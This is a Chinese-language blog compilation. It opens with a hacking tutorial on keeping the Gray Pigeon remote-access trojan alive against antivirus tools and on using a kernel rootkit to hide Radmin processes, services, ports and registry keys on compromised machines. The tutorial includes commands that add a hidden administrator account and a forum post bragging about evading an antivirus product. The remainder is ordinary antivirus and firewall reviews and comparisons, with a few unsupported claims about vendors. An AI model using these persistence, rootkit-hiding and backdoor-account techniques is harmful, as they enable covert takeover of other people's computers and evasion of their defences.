二:杀软杀不尽,关机开又来的不死神鸽.首先还是配置,无注册,无服务,注射IE,不隐藏进程,重要的一点,运行后不要删除本身.然后还是修改 进程,免杀等等,这里的鸽子服务端免杀要保证文件都过,内存什么的没什么关系,改完后就开始再次用DELPHI或VB资源捆绑了,这次有点麻烦,要设置好 这个不删除本身服务端的复制路径,同时资源捆绑的文件要本身删除,不留痕迹,还要加入自定义开机启动指向那个运行后不删除自身的服务端,这样就实现了不死 神鸽,运行原理是这样的,开机启动服务端,并且复制到指定路径启动,这样就过了自家专杀,行为,防漏,主动,等等,哪怕被内存查杀,甚至对应文件查杀,只 要保证你的不删除服务端不被查杀,则杀软杀不尽,开机又回来.
黑客守卫者+鸽子免杀=无敌神鸽
[post] 我们都知道凤凰VIP的免杀鸽子很好用,这是公认的,这个鸽子中到家用PC上还可以但要是放到服务器上就有点让人担心了.
1.管理员查下进程就OK了,
2.看下可以服务,因为鸽子他会加为服务,
3.netstat -an这个我就不用说了吧 大家都知道.
好了,现在我就为大家做个无敌神鸽,其实用一个软件就可以了,
黑客守卫者,一个内核级后门软件,先看下他的说明大家就都明白了,
黑客守护者是一款异常强大的驱动级后门!可以隐藏你的木马和后门的端口,服务,进程
这里写入你要隐藏的文件和文件夹名称
第一个是隐藏黑客守卫者自己的,建议不要删除
好,比如我们给肉鸡装了个Radmin吧,那我们就在隐藏文件里把它的服务端文件rserver.exe加到这里
注意一行一个哦~
你也可以用通配符*
这样到话只要是以rserv开头到文件夹和文件名都会隐藏
------------------------
隐藏进程和隐藏文件一样
我们把rserver.exe也加到这里
当然,它同样支持通配符*
下面是隐藏服务
Radmin的服务名是r_server
所以我们把它加到下面
------------------------
隐藏端口
4899是RADMIN到默认端口,TCP协议的,那么我们在TCP端口里面添上4899
可能你还开了肉鸡的3389,那我们把3389也加到里面,用[,]隔开
UDP端口和TCP端口一样
------------------------
隐藏注册表
已经有的是黑客守卫者自己的注册表项
你可以在这里把你的木马的注册表项隐藏
RADMIN的注册表项是RAdmin
所以我们加到里面就可以了
------------------------
跟随启动
就是让某个程序跟随黑客守卫者启动
它支持系统变量和运行参数
比如要肉鸡开机后添加一个用户
我们可以这样添
%windir%\system32\cmd.exe /c net user coofly 123456 /add
你要提权这个用户的话再加一个
%windir%\system32\cmd.exe /c net localgroup administrators coofly /add
这样就好了``
------------------------
后门设置
黑客守卫者启动后,你可以从任意一个端口用黑客守卫者提供的客户端进行连接,得到一个管理员权限的CMD SHELL
连接密码就是你登录SHELL的密码了
黑客守卫者是以驱动和服务两种方法启动的
服务名称就是黑客守卫者的启动服务名称了
显示名称和描述大家应该都明白,如果改了服务名称,那么在隐藏服务里应该把改后的服务名称也加进去
比如我改成
hackdoor
那么我们应该在隐藏服务里它把也加进去
驱动名称和驱动文件名称可以随便改
不过要注意的是驱动文件名称必须是.SYS结尾的
------------------------
生成配置
现在已经配置好了,我们可以生成配置文件了
点生成配置,然后选择保存位置
添上文件名,点保存就可以OK咯!!~
现在大家应该明白怎么可以做出无敌的鸽子了吧!
因为黑客守卫者生成出来的是两个文件你要想和鸽子捆绑到一块可以用个凤凰的捆绑软件就可以了..[/post]
对世面上出现几款远控调查
上兴 18 票
牧民灰鸽子 8 票
网络红娘 3 票
守望者 4 票
熊宝宝远控 6 票
黑洞 13 票
黑赢 2 票
其他…… 9 票
病毒灰鸽子论坛管理员weiwen发的帖子:
今天对微点进行了一次鸽子上线的测试!
本帖被 weiwen 执行提前操作(2007-04-06)
今天对微点(微点主动防御软件(Micropoint Proactive Defense Software)) 进行了一次鸽子上线的测试,微点真是如用户所讲的如此历害吗?经过我半个小时的测试和修改(服务端不需要太大的修改),鸽子非常轻易的上线了(有图为 证),而且微点没有任何的提示(全开监控状态),对微点真是非常失望,经过这么多年的经验,个人感觉什么杀软都不可信,更不要信谁强谁弱,其实本质一样, 而且令我更加相信了杀软公司的商业行为,赚钱!!!!
注明:重启PC后微点同样没有任何的提示下上线!
测试后本人对微点杀软体会:集合了各大杀软的欺骗手法,换句话讲只是对鸽子代码比较了解深一些,并不是技术性的行为拦截和查杀。
看来还是杀软+防火墙+PG+还原工具或+虚拟机才能安全了
杀软+防火墙+hips,再加上良好的上网习惯。
用还原工具冰点(Deep freeze)就不用装虚拟机,“影子系统”这个软件的安全性我的评估(“影子系统”可能自身就是木马http://qxbbs.org/viewtopic.php?t=192973),而联想冰封可能是是中共邪教中科院的作品,也用不得
卡巴斯基“行为分析”以及“主动防御”技术、微点主动防御软件以及德国的小红伞AntiVir都在灰鸽子管理员的破坏之列,看来杀软真的不可信
Labels: antivirus
免费的安全盛宴
本贴宗旨:(卡饭论坛独家首发,如需转贴敬请注明出自卡饭论坛)
1. 免费的同时考虑其性能和口碑,更多免费AV+FW请参考这里:
http://www.kpfans.com/bbs/viewthread.php?tid=14608&highlight=%CD%EA%C8%AB%C3%E2%B7%D1
2. 不涉及版权问题,使用以下软件,您将是百分之百的正版用户!
(因此本贴不讨论Mcafee, Norton等软件的使用问题 )
3. 终身免费,不是试用!
4. 友情提醒:根据免费软件的使用协议,您如果使用后依然中毒,或导致系统冲突,进而引起数据损毁甚至硬件损坏等不良后果一概由您自行承担。因此如果您对软件尚不甚了解,请到论坛各专区学习,或请专人指导,或发帖求助。
5. 关于某些测试方法:
网上流行的将一段代码保存为文本文件来测试杀软,这一测试是否科学暂且不论,但文本文件是目前很多先进杀软默认不监控的文件类型,所以应先把监控文件类型调整为“所有”,再测试。
另外在线测试防火墙的网站很多,如果您是内网用户就免了,因为这些测试扫描的是您的路由或网关,而不是本机。
如果不考虑英文版本的因素,免费产品好过某些收费产品也是完全可能的!
组合1(适合各种个人用户使用)
免费C版小红伞Antivir(使用者所需英语程度:小学)+免费COMODO墙(科摩多防火墙首个支持的国际语言为中文)+SSM免费版(可选,不是必需,已有中文版)
Antivir来自德国的启发式杀软,资源占用较低,绝无卡机一说,目前第3代启发式引擎已经放出!卡饭论坛已于去年11月8日全国独家开辟专区予以介绍,故在此从略,请前往专区版面细看。Antivir设置比卡巴要简单许多,事实证明很多卡饭无需汉化就能自如使用英文版,因此Antivir的使用应该不是大问题(内核保护,因此没有汉化版)。
免费C版下载
Comodo Personal Firewall Pro来自英国的完全免费的强大防火墙
Comodo Firewall 的特点?
Comodo Firewall是少数完全实现TCP/UDP 全状态检测的个人防火墙。Comodo Firewall 自身集成了COMODO 已认证程序数据库,包括了近20000个通过认证的可执行文件的数字认证(校验)信息。
Comodo最大的特点是两层保护,网络防火墙和应用程序防火墙(应用程序+组件检测)。
网络防火墙:
网络防火墙通过全状态检测,可以追踪每一个接收和发送的数据包,并且对TCP, UDP, FTP等协议进行智能分析。还可以检测和防御DOS/DDOS 攻击: SYN/UDP/ICMP Floods, TCP/UDP Port Scans 。遇到DOS/DDOS攻击,将进入紧急状态,即使在用户毫不知情的情况下,可以根据攻击者的行为自动添加规则和调整内部状态,防御入侵。
应用程序防火墙:
网络防火墙主要用于来自外部的攻击,对于控制内部的病毒、木马等的网络活动,需要应用程序防火墙。
Comodo Firewall的应用程序防火墙是目前市面上最好的之一,应用程序过滤除了限制端口、协议等,还可以限制每分钟的连接数,还包括组件控制和程序行为分析。
Comodo 有一个最大的优点是它的防泄露(Anti-Leak)能力十分强大,可以通过目前已知的所有Leak-tests。对于保护隐私数据,防止恶意软件隐藏自己的行为,劫持信任程序,绕过防火墙,十分强大。
为了提供对恶意软件的总体解决方案,Comodo Firewall V3 将加入HIPS功能,敬请期待。
Comodo Firewall是终生免费,还是免费一年?
Comodo Firewall对个人和商业用户都是完全免费的。
2.4正式版采用了新的授权方式,安装过程中,将获得永久免费使用许可,而不再需要申请注册码。
COMODO是世界第二大全球认证数字证书服务商,对它的安全产品可以像对Norton、McAfee、Kaspersky一样信任,即使是免费产品,绝 不会捆绑任何垃圾在里面。提供高品质完全免费的桌面安全产品(包括杀毒软件、防火墙等等),是COMODO的一项市场策略,是为了提高品牌的知名度。当越 来越多的人使用 COMODO的桌面安全产品以后,就会促使更多的大型商业网站购买COMODO的数字认证,这才是它的主要收入来源,也是它免费的重要原因。
拦截木马实战:样本区有一个flo朋友编写的穿墙木马演示程序,您可以自行试验一下各种防火墙的拦截效果。事实证明Leak-test对个人桌面安全产品 的重要性,而Comodo强大的行为检测能力可见一斑。(试验时请关闭杀软和HIPS软件,flo放出这个程序的时候曾经过掉了各大杀软的启发式检测,当 然现在都已经上报了)
一般只有BT、EMULE和某些网络游戏的规则需要自设,请各位自行到专区谷歌一下,有现成的可用。
下载:
由于是终身免费,已集成了注册码,不再需要在线激活
目前的更新:最新测试版中已经集成一个终身KEY,装完在线激活即可。卡饭论坛已于07年1月1日特开辟专区予以介绍,请移步该区详细讨论。注意:简体中文版为官方汉化版本,并不支持中文的应用程序路径,请手动添加这些程序到信任区域即可。
目前的2.4.18.184正式版下载(请自行选择不同的语言版本)
http://www.personalfirewall.comodo.com/download_firewall.html
官方主页
http://www.comodogroup.com
Comodo Firewall v3将集成Sandbox和HIPS,到时就只需一个好的Anti-Virus即可高枕无忧,明年年初将出,敬请期待!
最新至强免费防火墙后补,PCTOOLS本月8日放出LNS核心的PC Tools Firewall Plus™ 1.0 for Windows。注册可选,完全免费!(LNS防火墙就不多作介绍了,请到专区查阅) 目前2.0.0.14版。可以跟踪观察后续版本推出。
下载:http://www.pctools.com/downloads/fwinstall.exe
来自俄罗斯的至强HIPS软件的免费版,仅比自家的收费版稍弱,不过也够用,免费版也有升级版本推出!
下载页面:http://syssafety.com/files.html
目前收费版为2.4.0.616(带网络功能)免费版为2.0.8.584-free(不带网络功能,比收费少一些拦截功能,从略),请根据需要下载即可。
组合2 (本组合安全性很高,但会牺牲部分使用上的便利。适用于不常安装新软件者使用,确保在干净无毒的新系统下安装好防火墙等所有软件,常用的网络软件让防火墙生成一下规则,最后再安装影子系统)
免费的影子系统+免费的COMODO/jetico防火墙
警告:经常需从“不安全”地带下载大量文件使用,或要与其它人交换文件者请使用组合1!影子系统用户最好配 备UPS电源系统使用。影子在软件层面相当于bios扩展而不是windows的一部分,作用于应用层之外,好处是程序极其健壮,不惧病毒和木马,不利的 一面是如果出现意外的情况(比如断电或未知的软件冲突)可能不是重装系统或者格式化系统分区就能解决的,敬请慎重选择!
最新影子系统简体中文免费版已经发布!
国产精品!官方已取消原来输入注册码解除时间限制的功能,改用在线激活方式,您只需要填入姓名和邮箱地址,就可以方便激活软件,激活后的软件将没有时间和功能限制,请放心使用!
对于全盘保护影子系统而言,本机已不怕病毒,故不装杀软,也免得影子重启将病毒库一并还原,多有不便。但是在影子系统里中木马,在重启之前还是有可能泄露ID信息,因此再装一个防木马外联泄露ID信息的墙即可。
组合3 EQSECURE+Antivir+Comodo
完全免费的4D防御组合,足以PK当今任何一种单一的收费互联网安全套装方案!强大的FD功能将使您轻松面对各种未知威胁!
其中值得一提的国产完全免费3D防护软件EqSecure V3.3,其规则高度可定制的特性使得其FD功能使用极为便利,如果您对HIPS尚不够熟悉,请到官方论坛置顶帖中学习。
注意:在EQ的AD和RD中要完全开放小红伞和comodo各可执行程序的权限,避免小红伞升级失败或comodo弹窗的现象(本组合资源占用令人满意,本人使用多日未出现任何不适症状
)官方下载
官方论坛
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onmouseover="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://www.eqsecure.com/eqsyswatch/main.gif');}" onmousewheel="return imgzoom(this);" alt="" border="0">附录一:其它至强的免费安全软件:
强力后补:版本再次更新!免费的主动防御软件Novatix Cyberhawk(遗憾,没有中文版)适合各种用户使用,可替代组合1中的SSM,或与你手头的组合搭配使用。
简而言之,就是美国版的“微点”,对个人用户完全免费!
界面简约,资源占用为1服务1托盘程序,比微点略小,安装后无需用户进行任何特殊设置,工作原理与微点类似,行为判断,不依靠病毒库升级,防御未知病毒木马的“零日威胁”!目前PRO版(15天试用)已出,但原有免费功能依然保留!
官方定位为传统杀软的补充,用户如需经常下载文件收藏或与他人交换文件(主动防御软件和微点一样不提供右键扫描功能),则可搭配使用一款小红伞这样的杀软即可,实测无冲突!
下载
http://www.novatix.com/点击"Download Cyberhawk Now"按纽进入下载页面即可。
辅助AV:
俄罗斯DR.WEB官方绿色版,请参见版主pmj_sh所发的贴子:
http://www.kpfans.com/bbs/viewth ... &extra=page%3D1
罗马尼亚BitDefender Antivirus 8 Free Edition,bidanyang卡饭首发:
免费使用世界顶级杀软引擎的唯一机会!(注意:不能实时监控,无反间谍库,非绿色版)
英文版下载
http://www.bitdefender.com/PRODUCT-14-en--BitDefender-8-Free-Edition.html
繁体中文版下载
www.bitdefender.com.hk/site/Main/view/Download-Free-Products.html#
感谢bidianyang补充免费的芬兰防火墙jetico:(再次感谢ubuntu提供链接!)
官方下载
注意:此个人防火墙版本不支持WINDOWS 98/me ,安装前请卸载旧版本!建议具备对照日志可进行程序和规则调试能力的用户使用。
使用指南:推荐仔细阅读ubuntu大大所著两篇文章:
Jetico in ubuntu Way 之:牛刀小试
Jetico in ubuntu Way 之:去芜存菁
感谢visual4补充免费的国产风云防火墙,内存占用不过区区5M,功能却如OP(毫不逊色)。
官方论坛为卡饭结盟论坛:
下载最新1.23版(全功能免费版,需要及时升级者请支持国货,购买收费版)
感谢pmj_sh版主补充杀软Active Virus Shield(OEM版简装卡巴)和美国HIPS软件DSA
Active Virus Shield下载
DSA下载
感谢ubuntu对科摩多防火墙的指正并补充了免费的影子系统:12月7日最新推出简体中文免费版2.8!
简体中文官方主页
Labels: antivirus
Tuesday, April 03, 2007
各大杀毒软件引擎介绍与对比
1、先从监控来看,瑞星2004-2005是用的DLL注入写的,也就是很多病毒用的方式,所以占内存非常大,监控很差劲。DLL注入监控最大的弱点就是对网页病毒监控困难,这也是瑞星最大的弱点。2006好像用了挂钩子技术,有很大进步。
KV的监控要好很多,差不多相当于防毒墙,你用迅雷下个病毒就知道了,在下载过程中就被干掉,而瑞星要在下载完才可以杀掉。
2、杀毒方面,这个就要看杀毒引擎了,KV的引擎跟卡巴的很类似,我不想打击大家,全世界只有五家公司有自己的引擎,其它都是仿制的,中国的杀毒软件也一样。瑞星的引擎不太好,无法彻底清除自我复制型病毒。这是瑞星第二大弱点。瑞星无法彻底清除病毒,像爱情后门、ROSE。瑞星杀毒不彻底。ROSE用瑞星杀毒以后还是不能直接双击打开,用KV直接可以恢复原样。
3、杀壳方面,瑞星现在的引擎是杀不了壳的,新的引擎还不知道脱壳技术怎么样,现在在公测。KV可以干掉流行的壳,这很不错了。不能杀壳的杀毒软件,意味着什么,对付有壳保护的病毒变种基本是废品。这也是杀毒软件引擎好坏的基本标准,为什么大家用卡巴,就是它脱壳厉害,是变种木马的克星。
4、病毒库方面,在这个方面,KV就差很多了,现在的KV病毒库非常不全,特别是木马库。引擎很好,但病毒库不全,这是KV的一个致命弱点。
5、自带的防火墙,瑞星的墙要比KV的墙好很多,这个我就不用说了。
全世界最厉害的杀毒引擎是DR.WEB,比卡巴的都厉害。基本上可以杀所有的壳,用的动态虚拟机脱壳技术,连北斗的也可以轻松干掉。
DR.web是一个俄罗斯的杀毒软件,就是大家所说的大蜘蛛。和卡巴基本是一样的,但引擎和技术不一样,是俄罗斯官方和军队的采用的产品,商业和个人大多是采用卡巴,分两个版本。
驱逐舰用的它的引擎,但毕竟是假蜘蛛,杀毒效果和DR.WEB根本不一样。
DR.WEB的技术是俄罗斯国家科学院为后盾的。这个杀毒软件公司目标不是赚钱,纯粹为了技术,所以现在都没有中文版,它从来不把二进制病毒和不能发作的木马列入病毒库,所以在一些测试中名字不是很靠前,甚至很少参加测评,但杀毒实力绝对在卡巴以上,占用内存很少,差不多4兆。
全世界五大杀毒引擎:
1、第一个当然是要说说诺顿了,首创实时监控技术,还知道微软的代码。大家都说诺顿不好,其实诺顿的引擎很强大。从最底层保护计算机,所以运行起来不太快,只是杀毒理念不同,才让诺顿不适合个人用户。它主要以隔离为主,防止企业文件被删除。因为有些被病毒感染了的文件根本不能完全杀毒。直接删除又会破坏文件,所以诺顿最适合企业用户选择。
2、第二应该就是咖啡了,这个杀毒软件把主要能力放在防毒上,也用了虚拟脱壳技术,基本所有壳都可以干掉,现在知道为什么它这么火了吧,北斗的壳,我不知道能不能干掉,但它的虚拟技术没有DR.WEB的好,用加密XTA算法(基本与DES一样很难破解)写的病毒,它和卡巴就都废掉了。
3、第三个就是熊猫了,哈哈,这个西班牙的东东,全球第一个自动升级的,人家的引擎也相当不错,速度绝对一流,查杀彻底,但病毒库有点欧洲化,所以在中国用着不太好用,占内存很大,金山好像现在就在仿熊猫,监控好像不是,杀毒和升级都是仿造熊猫的,金山的监控很LJ,你用用就知道了。
4、这个就是俄罗斯的卡巴斯基了,6.0 的引擎我还没有分析过,人家的确是自己的引擎,以前KV就是防造的卡巴。但现在的KV好像更优化了。
5、DR.WEB、也是俄罗斯的引擎,俄罗斯国家科学院合作开发的,军方和克里姆林宫专用。启发式加虚拟脱壳,北斗的壳,外面再加壳,加跳针也可以干掉,占用内存很少。可以说是最强的引擎。对付变种病毒和木马最好了。可以干掉加密XTA算法。清除极其复杂的病毒。
驱逐舰用的它的引擎,但毕竟是假蜘蛛,杀毒效果和DR.WEB根本不一样。
今天用驱逐舰全面扫描了一下,没有发现什么。但用DR.WEB一扫发现这么多没有扫出来,虽然大多数是广告。
看来核心技术比DR.WEB 还是差很多,大家不要以为你真的用上了DR.WEB。人家俄罗斯说了,核心的东西是不卖的。
关于NOD这个我说一下,我不是很清楚这个杀毒软件,不过它的引擎好像不是自己的。好像是自己做了很大的改进,杀毒很像熊猫,又不是熊猫,监控和 DR.WEB很像,形势好像也一样,有两个进程,监控用的虚拟脱壳加启发式,但方式绝对不一样。我也不清楚它是谁的引擎,监控很智能,我晚上试了一下可以对付一次北斗加壳的病毒,加了跳针就不行了。我一运行灰鸽子竟然在我的计算机上生成了一个自动连接的文件,NOD一点都没有感觉。让我忙了好久才杀掉。加了内存免杀直接就过了,监控上存在一个很大的问题,对付两次加北斗壳的病毒,完全没有感觉,你可以加两次壳上报给它,估计会得奖。
再就是它对付国内的木马,很差劲,很多杀不出来。特别是现在国内木马这么猖獗,你看到瑞星升级的病毒库了吗?木马几乎占90%,我感觉还是别用这个杀毒软件好。我试了几个盗QQ的木马,结果就查出一个来。这个杀毒软件我感觉还是不错的,在国内用就感觉不合适了。对付灰鸽子不如KV,不是说它杀毒不行,是病毒库的问题。软件很不错,我很喜欢这个杀毒软件,理念很先进,占内存又少。我对它不是很了解,不要骂我。
今天我加入趋势和小红伞,趋势是日本控股的杀毒软件,所以我一直都不用。不过我大二的时候趋势出了一个很好的破解,我就把学办的计算机都装了趋势(我当时在法学院学办和网站勤工俭学做反病毒和维修工)。不是因为它好用,我只是想让小日本的升级服务器硬盘多转转,给它耗耗电,也让他为中国人民免费工作工作。趋势前几年很厉害的,特别是它的企业版,基本可以和咖啡抗衡。它的引擎是模仿诺顿的,理念也和诺顿一样。记得我上中学时它出了一个乐亿阳,当时卖28块钱,还有监控带升级。那个时候,瑞星还是3张软盘呢,但它的个人版真的不怎么样,要用就用企业版吧。
小红伞是典型的DR.WEB的模仿产品。至少杀毒引擎一样,应该和驱逐舰的效果差不多,连启动扫描的方式都一样。内存扫描和杀毒扫描分开。这个家伙我是很喜欢的,很早以前就用过,竟然杀掉了当时瑞星杀不了的爱情后门,用的还是那个免费的。你们喜欢的钛金版,当时由于没有升级的方法就放弃了。
还有人说卡巴的杀毒太占内存了,这个是真的。我感觉卡巴并不成功,至少不是一个最好的杀毒软件。一个好的杀毒软件,最应该做到的就是不拖计算机。看看NOD32的设计,要是NOD有卡巴的病毒库,估计我会一直用它。今天用NOD32开了几个网页,又中毒了,简直就是对中国用户的漠视,关键是在中国没有市场,没有利润才会这样。
不过要是大家买正版的话,我还是推荐中国的。我就一直买正版,包括我的XP都是正版的,真的就是比大街上买的那些Xp稳定。所以测试还是别用那些所谓的破解,瑞星2005的盗版和正版的杀毒就有区别。但我很少买外国的正版,一直用江民的正版,瑞星我也有正版,当时是为了测试用了它。你知道以前的瑞星总会有个提示,请反复查杀。什么叫反复,就是一次清除不了,就是说明2005版瑞星的引擎跳杀很严重,一次不能彻底清除自我复制型病毒。
那个瑞星2005的时候,我当时拿着盒饭站在服务器前面,看着它的监控被爱情后门干掉的,伤心死了。金山我是买的金山网镖V,90大洋啊。用金山的朋友注意了,它的中级规则,是不防止别人PING的,调到高级又没法在线看电影,规则真的不太好,不过一般家庭也够了。卡巴斯基防黑客在局域网好像也不能防止别人PING你,KIS6.0的防火墙,我还没有试过,但推荐你把它调成学习模式,它默认的是低。
现在不买金山了,你要买的话就买KV和新引擎的瑞星吧。估计新引擎的瑞星要胜过KV,前提是KV不进步,但KV和卡巴最近的合作很密切,估计到下一个版本,引擎可能会达到卡巴6.0的标准。支持国产,中国才会强大!你看看韩国的汽车,基本韩国人都用韩国自己的汽车。卡巴的扫描是所有文件都扫描,所以很卡阿,你关了监控也没有用,它在系统内部运行。不过杀毒绝对……不说了。
Labels: antivirus
国产杀毒软件的致命缺陷
杀毒软件是一个需要高技术积累的行业,国产三强只有江民的历史比较悠久(目前在网络也是他评价较高,但是稳定一直是个问题),所以无论是病毒样本的收集还是和病毒分析的历史和国际一些老牌厂商是无法对比的。金山当年的崛起除了网络免费推广的作用外,还有集成俄罗斯的著名杀毒软件Dr.web引擎的双引擎战略的重要作用,虽然当时金山公司自己的引擎开发不是很成熟,但是有强悍的Dr.web引擎支持,当时的金山毒霸的杀毒效果还是很不错的。这两个战略的推广也一举奠定了金山国产杀毒软件三强的地位!可惜后来由于种种原因,和Dr.web的集成没有继续下去。直到今年,韩国的驱逐舰杀毒也靠着Dr.web的引擎再次进攻大陆市场……
关于病毒样本的问题,由于国内厂商的市场开发区域比较狭窄,收集样本的能力没有办法和国外一些老牌的厂商比较。加上引擎还是以特征码为主的杀毒形式,这也是金山和光华这次VB100%测试失利的重要原因。对于病毒库,目前国际上的一些新兴杀毒厂商有交换病毒库的方式可以借鉴,今天TopTenREVIEWS排名第一的BitDefender病毒库据说就是这样积累到了50多万之巨!
二、 引擎之短
国内杀毒软件每年推出新版本的时候都提出自己的新版本的引擎是第N代先进引擎,杀毒能力有了多大的进步。但是一到具体运用,就发现杀毒能力还是老样子。
瑞星的监控一直是用DLL注入的方式(呵呵,和很多病毒木马相同),造成了监控的时候占用系统资源巨大,脱壳能力也非常糟糕,只能脱掉UPX壳,病毒和木马只要一加其他的壳就没办法对付了,不是查不出就是不停的跳杀。
金山估计是当年受Dr.web的影响,他的杀毒软件占用也很小,杀毒速度很快,但是他根本没有杀带壳的病毒能力,结果造成了在杀毒的时候跳杀非常厉害。
江民由于当初开发的杀毒引擎有独到之处,在监控和杀毒方面都有不错的表现,在杀壳方面除了杀掉UPX和ASPack壳之外,还可以杀一些比较流行的壳。据说他的杀毒引擎一定程度借鉴了卡巴斯基的引擎,但是杀壳的能力比卡巴斯基就差多了,但是扫描和监控的速度比卡巴斯基强不少。
国产三强的引擎发展技术现在已经落后于当前时代的发展,当前国际上杀毒软件的发展非常迅速,虽然有卡巴斯基和BitDefender这样把特征码杀毒几乎做到极致的软件,但是这种杀毒技术已经逐渐日落西山。以NOD32、Dr.web、Avira等为代表的启发杀毒已经逐渐成熟,只要启发设置的合理,几乎可以发现所有的未知病毒和变种病毒(这也是NOD32在病毒库并没有一些国际巨头全的情况下,可以创造43次参加VB 100%测试仅仅3次失手的神话的秘密武器之一!)。
目前在杀毒软件界,行为杀毒是新兴起的技术。顾名思义,行为杀毒就是在杀毒软件的监控系统发现威胁行为时就报警并提示杀毒的技术。目前卡巴斯基6.0一定程度上集成了行为杀毒的能力,这样就大大提高他对未知威胁的处理能力。关于行为杀毒,中国的微点,美国的Cyberhawk(目前都在测试中)也有不错的表现,作为单独的主动防御模块,他们是一些优秀杀毒软件良好的补充。
可惜在国产主流杀毒的当前版本中,目前这两大新技术都根本没有。所以造成了他们在对付现在互联网时代病毒时候处于疲于奔命的状态。哪怕是已经被发现的病毒或木马只要加一个偏门的壳,或者稍稍变种一下,国产的主流杀毒软件就全部放行……。这也是已经肆虐了半年多的维金病毒还是在国内到处危害的原因(变种不断出现……)。
说了那么多的沉重,再谈谈希望。今年杀毒软件市场还有不少新的亮点,金山和光华勇敢的参与了VB100%的测试,虽然失败而归,但是拿到测试结果后我们可以明白和国际一流杀毒软件对比,自己的差距在什么地方。就会开阔眼界,更有针对性的改进自己的产品。相信他们的产品在下个版本会有重要的进步。
瑞星杀毒软件2007版中,加入了启发杀毒和虚拟机脱壳的技术,这是非常令人欣喜的,杀毒能力肯定会有大幅度提升!瑞星最近也参加了欧洲的几个测试,排名还不错,也超过了一些老牌选手。江民2007上集成了HIPS功能(一定程度接近行为杀毒技术),加强了系统的主动防御能力。从去年开始测试的微点,依靠其先进行为杀毒技术,逐渐在网络上有了很多FANS,虽然由于种种原因,一直没有正式上市,相信他上市以后对中国当前的杀毒软件市场也会有一定的冲击。
我们国产杀毒软件这两年也很努力,功能虽然和国际一流产品还有些不足。但是按照目前一些发展的趋势,各种先进的杀毒技术在国内被逐渐引进,引擎和病毒库的完善也在和不断的对外交流中可以逐渐得到提高,国内的一些主流杀毒软件正在逐渐形成自己的技术特色并拥有自己的一些关键技术(国际一些著名的杀毒软件都是靠自己的一些特色技术和其他功能的完善来闯荡江湖的)。有可能逐渐赶上当前那些领先者。
其实如果要是真的追求快速发展,目前国产杀毒软件的两大软肋也是可以比较快的解决的。引擎的问题在自己的引擎不断完善的基础上,可以和当年的金山一样和国外一些著名的杀毒软件谈判,集成他们先进的引擎。(个人认为,用国内病毒库来和国外著名厂商交换也是一种双赢的选择)。病毒库的完善也可以用类似的办法,正如上面所说的,一些新兴地域性厂商就是这样完善自己的病毒库的。
Labels: antivirus
杀毒软件,个人使用情况总结
前两天一哥们在他空间上细说了他用的杀毒软件的体验,呵呵,没事可干,我自己也来写一份。
呵呵,我没水平搞那么多病毒评测,就单纯从我个人用户角度,以及卡饭论坛上的他人使用感受结合一些病毒测试专业数据来说说吧。
1、卡巴斯基(Kaspersky Antivirus 6.0) 如雷贯耳的大名,特征码病毒判断的领导产品,下手狠著称。当然“卡吧死机”也是最生动的写照,由于一时失误,我的电脑被一个前“熊猫烧香”时代的类似病毒搞得很郁闷,加之以前卡5的被干经历,现在卡巴是我的辅助杀毒软件。
2、诺顿和咖啡(Norton and Mcafee) 诺顿还是04年以前用过,当时的冲击波病毒爆发时,诺顿总是提示,就是不杀,搞得电脑经常死机,所以只有把它给咔嚓了。至于咖啡,我是个人用户,它搞得那些防护总感觉不是很方便,杀毒水平又一般(感觉比诺顿好点),但我觉得它还是不错的,综合水平挺高。这两个都是企业级防护,耗起硬件来毫不含糊,拖这两个杀软用电脑真的不爽哈。
3、avast and AntiVir (小红伞) 两款欧洲的杀毒软件,都是免费,杀毒能力感觉小红伞强大一些,防护能力avast好些。最主要是免费,功能也足够强大。可是AntiVir容易走火入魔,杀敌可以,保护自己还差点。avast比较让我无语,虽然杀毒也不是很差,可是打开软件时,弹出的网页总是错误,就不得不让我怀疑这家厂商到底是干什么的了。
4、ESET NOD32 这是我现在使用的杀毒软件,好多论坛上的帖子都说他杀木马不行。我个人使用下来,这款软件正是我想要找的。首先,速度很快,没有卡吧死机的卡,第二,杀毒也很不错,上网时经常会弹出网站挂马的警示,而且是权威的VB100%最多获奖的杀毒软件,至于杀毒咋样,感觉还是很不错的。至于加一个卡巴斯基,主要还是以往对卡巴的超强信任感,但是好像也没起到什么作用,该杀的已经被NOD32给干掉了。
5、其他的杀毒软件我没怎么用过,看看论坛上的帖子,主要推荐的有以下几个,Dr Web,据说是俄军方使用的,具体什么样子我不知道,大家都说它不错。驱逐舰,韩国的,用了Dr Web内核,算了,还不如直接用原来的呢。趋势,呵呵,这个家伙是学校机房用的,可能是没及时升级,机房的电脑就是一个病毒库,什么最新的病毒全部都是从那儿搞来的,造成我对它的极其不信任。
6、至于国产的,由于是本土产品,对本地病毒还是比较了解的,杀毒水平怎么样,我只看到过别人用瑞星,自己用过金山毒霸,这也可能是造成我以下排名的最主要原因吧,从个人好恶(主观占的比较多)以及杀毒水平综合排名如下 第一 江民,第二 瑞星,第三 微点(据说不错,没见过,先排在这儿),第四 金山(个人使用下来最垃圾的)。
以上说了那么多,除了金山以外(不知道为什么,就是讨厌金山),其他各款各有各的优势,选择适合自己的才是最好的。
Labels: antivirus
